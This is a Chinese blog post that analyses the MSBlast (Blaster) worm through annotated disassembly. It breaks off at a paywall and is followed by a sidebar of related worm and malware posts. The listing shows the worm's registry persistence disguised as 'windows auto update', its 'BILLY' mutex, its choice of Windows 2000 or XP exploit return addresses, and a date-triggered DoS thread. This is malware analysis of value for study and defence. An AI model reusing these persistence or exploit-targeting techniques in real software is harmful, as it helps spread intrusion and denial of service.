msblast蠕虫主要代码分析

最新推荐文章于 2024-07-04 12:35:30 发布
最新推荐文章于 2024-07-04 12:35:30 发布
阅读量3.9k 收藏 3
点赞数 2
分类专栏: 技术文档 文章标签: 代码分析 c dos windows deb byte
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunwear/article/details/288004
版权
tombkeeper#whitecell.org


;在注册表中写入自启动项
:00401250 55                      push ebp
:00401251 89E5                    mov ebp, esp
:00401253 81ECAC030000            sub esp, 000003AC
:00401259 56                      push esi
:0040125A 57                      push edi
:0040125B 31F6                    xor esi, esi
:0040125D 6A00                    push 00000000
:0040125F 8D45F8                  lea eax, dword ptr [ebp-08]
:00401262 50                      push eax
:00401263 6A00                    push 00000000
:00401265 683F000F00              push 000F003F
:0040126A 6A00                    push 00000000
:0040126C 6A00                    push 00000000
:0040126E 6A00                    push 00000000
:00401270 685D484000              push 0040485D        ;db 'SOFTWARE/Microsoft/Windows/CurrentVersion/Run',0
:00401275 6802000080              push 80000002
:0040127A E80D110000              Call 0040238C        ;ADVAPI32.RegCreateKeyExA
:0040127F 6A32                    push 00000032
:00401281 683C404000              push 0040403C        ;db 'msblast.exe',0
:00401286 6A01                    push 00000001
:00401288 6A00                    push 00000000
:0040128A 6849484000              push 00404849        ;db 'windows auto update',0
:0040128F FF75F8                  push [ebp-08]
:00401292 E801110000              Call 00402398        ;ADVAPI32.RegSetValueExA
:00401297 FF75F8                  push [ebp-08]
:0040129A E8E1100000              Call 00402380        ;ADVAPI32.RegCloseKey
;创建互斥体
:0040129F 6843484000              push 00404843        ;db 'BILLY',0        
:004012A4 6A01                    push 00000001
:004012A6 6A00                    push 00000000
:004012A8 E8A3100000              Call 00402350        ;KERNEL32.CreateMutexA
……………………
;选择发送数据的随机数
:00401476 E8BD0E0000              Call 00402338        ;KERNEL32.GetTickCount
:0040147B 50                      push eax        ;用GetTickCount的输出作为srand的随机数种子
:0040147C E8B30F0000              Call 00402434        ;CRTDLL.srand
:00401481 59                      pop ecx
:00401482 E8890F0000              Call 00402410        ;CRTDLL.rand
:00401487 B914000000              mov ecx, 00000014
:0040148C 99                      cdq
:0040148D F7F9                    idiv ecx        ;
:0040148F 83FA0C                  cmp edx, 0000000C
:00401492 7D02                    jge 00401496
:00401494 31F6                    xor esi, esi
:00401496 C7053431400001000000    mov dword ptr [00403134], 00000001
:004014A0 E86B0F0000              Call 00402410        ;CRTDLL.rand
:004014A5 B90A000000              mov ecx, 0000000A
:004014AA 99                      cdq
:004014AB F7F9                    idiv ecx
:004014AD 83FA07                  cmp edx, 00000007
:004014B0 7E0A                    jle 004014BC
:004014B2 C7053431400002000000    mov dword ptr [00403134], 00000002
……………………
:00401954 833D3431400001          cmp dword ptr [00403134], 00000001      ;通过比较这个地址来确定发送针对2000还是XP的攻击代码
:0040195B 750C                    jne 00401969
:0040195D C785ECEAFFFF9D130001    mov dword ptr [ebp+FFFFEAEC], 0100139D  ;使用针对Windows XP的跳转地址
:00401967 EB0A                    jmp 00401973
:00401969 C785ECEAFFFF9F751800    mov dword ptr [ebp+FFFFEAEC], 0018759F  ;使用针对Windows 2000的跳转地址
……………………
;判断日期
:004014FC 6A03                    push 00000003        ;size of buffer
:004014FE 8D45F4                  lea eax, dword ptr [ebp-0C]
:00401501 50                      push eax        ;buffer
:00401502 683C484000              push 0040483C        ;db 'd',0    取日期
:00401507 6A00                    push 00000000
:00401509 6A00                    push 00000000
:0040150B 6809040000              push 00000409        ;"0409"="en-us;英语 (美国)"
;从GetDateFormatA的Locale参数来看,作者使用的操作系统的区域设置是美国。
:00401510 E8E70D0000              Call 004022FC        ;KERNEL32.GetDateFormatA
:00401515 6A03                    push 00000003
:00401517 8D45F0                  lea eax, dword ptr [ebp-10]
:0040151A 50                      push eax
:0040151B 683A484000              push 0040483A        ;db 'M',0    取月份
:00401520 6A00                    push 00000000
:00401522 6A00                    push 00000000
:00401524 6809040000              push 00000409
:00401529 E8CE0D0000              Call 004022FC        ;KERNEL32.GetDateFormatA
:0040152E 8D45F4                  lea eax, dword ptr [ebp-0C]
:00401531 50                      push eax
:00401532 E8790E0000              Call 004023B0        ;CRTDLL.atoi
:00401537 59                      pop ecx
:00401538 83F80F                  cmp eax, 0000000F    ;比较日期是否大于15日
:0040153B 7F0F                    jg 0040154C        ;日期大于15日则跳到创建DoS线程
:0040153D 8D7DF0                  lea edi, dword ptr [ebp-10]
:00401540 57                      push edi
:00401541 E86A0E0000              Call 004023B0        ;CRTDLL.atoi
:00401546 59                      pop ecx
:00401547 83F808                  cmp eax, 00000008    ;比较月份是否大于8月
:0040154A 7E16                    jle 00401562        ;月份大于8月则往下执行创建DoS线程
:0040154C 8D45FC                  lea eax, dword ptr [ebp-04]
:0040154F 50                      push eax
:00401550 6A00                    push 00000000
:00401552 6A00                    push 00000000
:00401554 68C11E4000              push 00401EC1        ;DoS子函数
:00401559 6A00                    push 00000000
:0040155B 6A00                    push 00000000
:0040155D E8120E0000              Call 00402374        ;KERNEL32.CreateThread
……………………
;处理地址子函数,转换结果保存在eax
:00401E8B 55                      push ebp
:00401E8C 89E5                    mov ebp, esp
:00401E8E 56                      push esi
:00401E8F 5
最低0.47元/天 解锁文章
sunwear
关注
专栏目录
莫里斯蠕虫源码
weixin_33734785的博客
11-10 1049
/* Magic numbers the program uses to identify other copies of itself. */#define REPORT_PORT 0x2c5d#define MAGIC_1 0x00148898#define MAGIC_2 0x00874697extern int pleasequit;/* This stops the...
蠕虫mysql_一个MS SQL蠕虫代码_MySQL
weixin_35698659的博客
02-04 239
by ha0k以下是十六进制转换后的,解码后的文件在下部,这个语句会在网站各个文件末尾插入一句JS 代码。---------------------------------------------------------------------------------';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041...
新浪微博老蠕虫代码分析
weixin_33888907的博客
07-15 244
逛酷壳看到2011年新浪那次比较大的XSS蠕虫传播事件,Post上给出了蠕虫代码,正好最近实习需要在狂补前端的各种,正好拿来分析下,菜分析,牛无视。 事件的经过线索如下: 20:14,开始有大量带V的认证用户中招转发蠕虫 20:30,2kt.cn中的病毒页面无法访问 20:32,新浪微博中hellosamy用户无法访问 21:0...
VBS蠕虫代码,慎用!后果与本人无关!
vliu612的博客
07-03 639
大家好,今天给大家分享一个vbs蠕虫代码,是我对上一期的进阶 ,想看上一期的搜索vbs冒烟代码。对了,这个代码没有解药,请勿在实体机上运行!废话不多说,直接上代码
蠕虫代码
08-25
网上找的一个蠕虫代码,对本机影响而以,不会对网络造成影响,研究一下之后可以.不过请注意,我每次运行之后都是把改善出的东西删除了,因为实际作用要在重启之后才会发生作用.慎用!
“冲击波”病毒(WORM_MSBlast.A) 安全补丁
11-03
遭受该蠕虫感染后可能出现以下现象,Word、Excel、Powerpoint等文件无法正常运行,弹出找不到链接文件的对话框,一些功能如“粘帖”等无法正常使用,控制面板出现异常、系统文件无法正常显示、Windows界面下的功能...
冲击波(Worm.Msblast)病毒的最新安全补丁程序
05-06
冲击波(Worm.Msblast)病毒是一种在2003年引起广泛影响的计算机蠕虫,它利用了微软Windows操作系统中的一个特定漏洞进行传播。该病毒主要通过互联网和网络共享进行快速扩散,对系统安全构成严重威胁。微软针对这个...
网络蠕虫、僵尸网络、APT分析与防护
最新发布
weixin_48579910的博客
07-04 1153
网络蠕虫是一种能够自我复制并通过网络传播的恶意软件,对计算机系统和网络造成严重威胁。了解网络蠕虫的特征、传播途径和经典案例,有助于制定有效的防护措施。通过定期更新和补丁管理、防病毒软件、防火墙、IDS/IPS系统、网络分段和安全意识培训等多层次的防护措施,可以有效预防和应对网络蠕虫的威胁,保护计算机系统和网络的安全。网络蠕虫为了实现自我复制和传播,通常采用多种技术来感染系统、躲避检测和增强传播效果。网络蠕虫通过多种技术实现自我复制、传播、持久性和隐蔽,以躲避检测并造成破坏。
一键关闭危险服务和常见病毒木马端口.zip
04-23
禁止网上邻居的文件传输;...关闭msblast冲击波蠕虫监听端口;关闭远程控制软件(remote administrator)服务端口;关闭远程控制软件VNC的两个默认服务端口;关闭木马Portal of Doom默认服务端口等等.....
网络蠕虫理论、代码大全
09-19
蠕虫病毒基本原理、以及一些经典的实现代码(C#版). 另附:一些其他病毒的原理。 还有一些 病毒防范的基本小技巧。其中包括了 怎么搭建蜜罐,APP网络欺骗原理及对策分析研究、定位网络故障、基于陷阱网络的病毒捕获系统研究与应用、计算机蠕虫疫苗的进展跟趋势说明、以及一些重点案例。
worms:蠕虫的源代码? 戴维·梅纳德(David S.Maynard)
03-17
蠕虫 蠕虫的第四语言源代码? 戴维·梅纳德(David S.Maynard) Atari 800版本:ATR文件来自David的原始软盘。 我将代码导出到ASCII文本文件中,以便于阅读。 David提供给我的磁盘,David慷慨地使用MIT许可证发布了该代码。 另请参阅以扫描打印的蠕虫? 源代码(多个版本)和以获取David的开发说明。
c语言内存泄露示例解析
12-31
正确的内存管理的重要性存在内存错误的 C 和 C++ 程序会导致各种问题。如果它们泄漏内存,则运行速度会逐渐变慢,并最终停止运行;如果覆盖内存,则会变得非常脆弱,很容易受到恶意用户的攻击。从 1988 年著名的莫里斯蠕虫 攻击到有关 Flash Player 和其他关键的零售级程序的最新安全警报都与缓冲区溢出有关:“大多数计算机安全漏洞都是缓冲区溢出”,Rodney Bates 在 2004 年写道。 在可以使用 C 或 C++ 的地方,也广泛支持使用其他许多通用语言(如 Java:trade_mark:、Ruby、Haskell、C#、Perl、Smalltalk 等),每种语言都有众多的爱好者和各自的优点。但是
asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC
04-08
描述 PLC 感染 Worm 的机制
Delphi来编写蠕虫病毒代码示例
九月的专栏
10-11 736
可能大家想到病毒,第一反应就是可能是用asm来编写,或者是vbsript,而高级语言如delphi就好象不能编写一样,其实事实并不是这个样子的,只要我们花一些时间,照样可以写出简短而高效的病毒程序来,一点也不输那些用汇编写出来的程序哦。   一个病毒程序首先要短小,我们的目
RPC蠕虫病毒主要技术源代码
zhangjie0072的专栏
06-01 3154
安全焦点网站于2003年7月21日发布了该漏洞的测试代码,现在的RPC蠕虫基本上是利用了该代码,我们现在转载该代码供大家研究。WINDOWS的RPC服务(RPCSS)存在漏洞,当发送一个畸形包的时候,会导致RPC服务无提示的崩溃掉。由于RPC服务是一个特殊的系统服务,许多应用和服务程序都依赖于他,因为可以造成这些程序与服务的拒绝服务。同时可以通过劫持epmapper管道和135端口的方法来提升权限
vbs类蠕虫病毒
热门推荐
HI_REY的博客
03-20 1万+
代码仅供参考,如有因攻击他人电脑导致的损失作者概不负责!
【Python脚本进阶】2.4、conficker蠕虫(终)
07-31 1367
【Python脚本进阶】conficker蠕虫
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值